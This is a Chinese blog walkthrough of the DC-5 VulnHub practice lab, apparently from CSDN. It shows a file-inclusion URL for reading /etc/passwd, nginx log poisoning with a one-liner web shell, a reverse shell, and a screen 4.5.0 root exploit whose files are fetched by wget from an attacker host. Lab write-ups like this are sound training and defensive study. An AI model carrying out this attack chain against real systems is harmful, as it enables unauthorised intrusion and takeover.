DC-5靶场

已于 2023-10-31 10:33:27 修改
阅读量846 收藏 4
点赞数 3
文章标签: web安全 网络安全
于 2022-12-14 13:44:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhx836161547/article/details/128313056
版权

目录

简介

dc系列靶场是比较适合新手的黑盒测试靶场,其中dc-5靶场下载连接如下

dc-5靶场下载地址

一.找IP地址

①netdiscover #扫内网
②nmap -sP 网段

这里采用方法①👇
在这里插入图片描述

扫出IP地址为:192.168.43.143

二.扫描IP端口

nmap -A -p- -T4 192.168.43.143

结果如下:
在这里插入图片描述

发现80端口开放,因此用浏览器访问

在这里插入图片描述

三.找web漏洞(文件包含)

看到网站,目录扫描查看目录结构
在这里插入图片描述

一个个网站去访问,最后发现在contact.php页面提交表单之后的thankyou.php文件包含了footer.php文件
再加上如图:
在这里插入图片描述

我们试着用伪协议去传参尝试一下文件包含

http://192.168.43.143/thankyou.php?file=/etc/passwd

成功文件包含
在这里插入图片描述

为什么要去访问/etc/passwd: 因为这个文件是系统用户配置文件,存储系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作

接下来我们就能用filter协议去访问文件源码

http://192.168.43.143/thankyou.php?file=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

但一个个去看源码对于这个靶场有些许麻烦

四.拿webshell

通过wappalyzer来查看网站版本为nginx1.6.2,对应版本的日志文件在/var/log/nginx/error.log下 ,因为被执行的内容都会被日志文件记录下来,因此,我们可以执行一句话木马,从而让一句话木马出现在日志文件里面,

抓包发送一句话木马
在这里插入图片描述

发送一句话木马后,然后根据蚁剑来连接拿到webshell
在这里插入图片描述

成功连接webshell
在这里插入图片描述

将shell反弹到kali上便于操作
kali监听4444端口:
在这里插入图片描述

然后蚁剑打开webshell去反弹
在这里插入图片描述

连接成功,查看当前目录下的文件:

在这里插入图片描述

在这里插入图片描述

五.提权

尝试提权:

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有一个screen-4.5.0,我们去kali的漏洞库搜索一下

searchsploit screen 4.5.0

在这里插入图片描述

看到存在漏洞,我们去查看一下漏洞的具体利用方法
注意:这里漏洞后侧显示的路径的根路径在/usr/share/exploitdb/exploits
先把指定文件复制到桌面上
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
然后在桌面上用vim打开文件
在这里插入图片描述

存储成三部分文件之后,把文件上传到靶场
注意这里,建议把.c文件上传到dc-5上,再去gcc编译,如果直接用kali的gcc编译后将编译后的文件上传上去,可能会导致dc5.sh文件在靶场shell运行的时候报错:未找到xxx版本的glibc
先在kali上监听端口5566,然后通过靶场的shell去下载文件
在这里插入图片描述

跳转到tmp文件夹下,用wget下到这个文件夹里面
为什么要利用tmp文件夹,因为普通用户在tmp文件夹下有较高的权限

wget 192.168.43.129:5566/libhax.c
wget 192.168.43.129:5566/rootshell.c
wget 192.168.43.129:5566/dc5.sh

下完之后,在这里直接gcc编译.c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c

编译完执行shell脚本

chmod +x dc5.sh 赋予dc5.sh执行文件的权限
./dc5.sh

最后
whoami 查看是否提权成功
提权成功
cd /root 发现有flag文件,成功拿到flag

总结

关键点①:
如何判断文件包含 thankyou.php文件包含footer.php
如何验证文件包含 file =/etc/passwd
如何去利用文件包含 :
去找到文件源码,从源码中找信息
但由于是nginx1.6.2,有一个error.log,因此可以利用一句话木马
关键点②:
提权:screnn4.5.0
如何去利用,searchsploit去寻找这个漏洞相关信息
帮助文档能看懂
如何去下载文件
开一个端口,让其它主机去访问这个端口从而下载文件

IDgoodis
关注
专栏目录
DC-5--vulnhub靶场
m0_46982383的博客
07-22 337
对文件包含漏洞运用、FUZZ、服务器日志利用、searchsploit的EXP利用
DC5靶场
qq_60848021的博客
09-19 1150
由上可以知道web服务器是nginx1.6.2,客户端向nginx服务器发送的每一条请求都会记录在访问日志上(客户端IP,浏览器信息,referer,请求处理时间,请求URL等都可以在访问日志中得到)。GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。它提供了统一的管理多个会话的界面和相应的功能。由以上可知道thankkyou.php调用footer.php,可能存在文件包含漏洞。正确的是:file=
DC系列靶场渗透测试流程总结
最新发布
zhouA0221的博客
08-19 1295
因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。先利用openssl命令创建一个密码,得到hash密码我们切换到tmp目录下,新建一个文件再回到/opt/devstuff/dist/test目录,执行程序test,将xiao的文件内容写入到/etc/passwd文件里面可以看到xiaofeixia用户已经添加到/etc/passwd文件里了,接下来然后使用命令su - xiao切换到我们添加的xiao用户,输入之前设置好密码即可登录.
Vulnhub靶场----5、DC-5
七天
03-14 672
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行。1.访问http://192.168.144.153,点击contact页面。网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;2.利用文件包含使上传的文件以PHP格式执行。4.使用python生成交互式shell。1.查找以root权限运行的组件。1.利用文件包含写入一句话木马。开放端口是80、36888。3、文件包含利用 获取权限。3.路径存在文件包含。
VulnHub靶场~DC-5
里丘~班诺的小屋
05-15 792
0X00 靶机的环境搭配 攻击机(Kali):192.168.238.130 靶机(DC-5):192.168.138 靶机地址:DC: 5 ~ VulnHub 0X01 信息收集 一、IP扫描 ┌──(root㉿kali)-[~] └─#arp-scan -l 二、端口扫描 ┌──(root㉿kali)-[~] └─# nmap -T4 -sV -O -A 192.168.238.138 三、网站目录扫描 ┌──(root㉿kali)...
DC-5靶场渗透】
一纸荒芜的博客
07-04 1717
DC-5 靶场
DC-6靶场
qq_49518993的博客
08-31 1255
DC-6靶场
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 403
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 633
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
vulnhub靶场DC-5
kukudeshuo的博客
07-13 606
vulnhub靶场DC-5 环境准备 攻击机:kali(192.168.58.130) 靶机:DC-5(192.168.58.148) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.148 使用nmap扫描查看目标靶机端口开放情况 开放端口:80、111、55980 web容器:nginx 浏览器访问目标靶机80端口 就只是一些文字,没
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1788
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-6 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 2012
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2866
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2949
dc-5靶场详细渗透过程
DC-5靶场实战
qq_42754807的博客
03-28 871
DC-5靶场实战
内网渗透DC-5靶场通关
qq_35664104的博客
10-12 2455
个人博客地址:点我 DC系列共9个靶场,本次来试玩一下一个 DC-5,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-5: 192.168.31.107 Kali: 192.168.31.18 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、111
DC系列靶场---DC 5靶场的渗透测试
zhouA0221的博客
08-06 1315
DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦。服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,file=footer.php。
Vulnhub DC-5靶场
weixin_47019868的博客
11-19 838
Vulnhub DC-5靶场
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值